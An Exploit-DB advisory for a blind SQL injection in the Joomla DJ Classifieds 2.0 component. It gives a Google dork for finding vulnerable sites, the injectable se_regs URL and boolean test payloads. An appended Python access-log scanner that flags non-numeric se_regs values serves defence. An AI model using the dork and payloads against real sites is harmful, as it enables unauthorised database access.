Joomla! Component dj-classifieds 2.0 – Blind SQL Injection

  • Author: Napsterakos
    Date: 2013-05-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/25248/
  • # Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
    # Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
    # Date: 4/5/2013
    # Exploit Author: Napsterakos
    # Vendor Homepage: http://design-joomla.eu
    # Software Link: -
    # Version: 2.0
    # Tested on: Linux
    
    
    Link: http://server/joomla/index.php/dj-classifieds/
    
    Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]
    
    # Exploit-DB Note:
    # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
    # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1
    
    Credits to: Greek Hacking Scene
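
A defender-side check, added here as an example (not part of the original advisory or of the component's code): it scans web access-log lines for `se_regs[]` values that are not plain integers, which catches the boolean test pair shown in the Exploit-DB note. It assumes `se_regs[]` is meant to carry numeric ids and that the log uses the combined format; the sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: se_regs[] holds numeric ids, so a legitimate value is digits only.
SE_REGS_KEY = re.compile(r"se_regs\[[0-9]*\]")
DIGITS_ONLY = re.compile(r"[0-9]+")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP range).
BASE = "/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&"
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2013:10:00:01 +0000] "GET ' + BASE
    + 'se_regs[0]=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [06/May/2013:10:00:05 +0000] "GET ' + BASE
    + 'se_regs%5B0%5D=1%20and%201=0 HTTP/1.1" 200 4801',
    '192.0.2.77 - - [06/May/2013:10:00:06 +0000] "GET ' + BASE
    + 'se_regs[0]=1+and+1=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [06/May/2013:10:00:09 +0000] '
    '"GET /joomla/index.php?option=com_content&id=1 HTTP/1.1" 200 900',
]

def suspicious_se_regs(url):
    """Return (key, value) for every se_regs[] parameter that is not a plain integer."""
    # parse_qsl percent-decodes keys and values, so encoded brackets/spaces are handled.
    pairs = parse_qsl(urlsplit(url).query)
    return [(k, v) for k, v in pairs
            if SE_REGS_KEY.fullmatch(k) and not DIGITS_ONLY.fullmatch(v)]

def scan_access_log(lines):
    """Return (line_no, client_ip, key, value) for flagged dj-classifieds requests."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match or "dj-classifieds" not in match.group(1):
            continue
        client_ip = line.split(" ", 1)[0]
        for key, value in suspicious_se_regs(match.group(1)):
            findings.append((line_no, client_ip, key, value))
    return findings

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The same digits-only rule is what the server side should enforce before the value reaches a query: cast each `se_regs[]` element to an integer and bind it as a parameter.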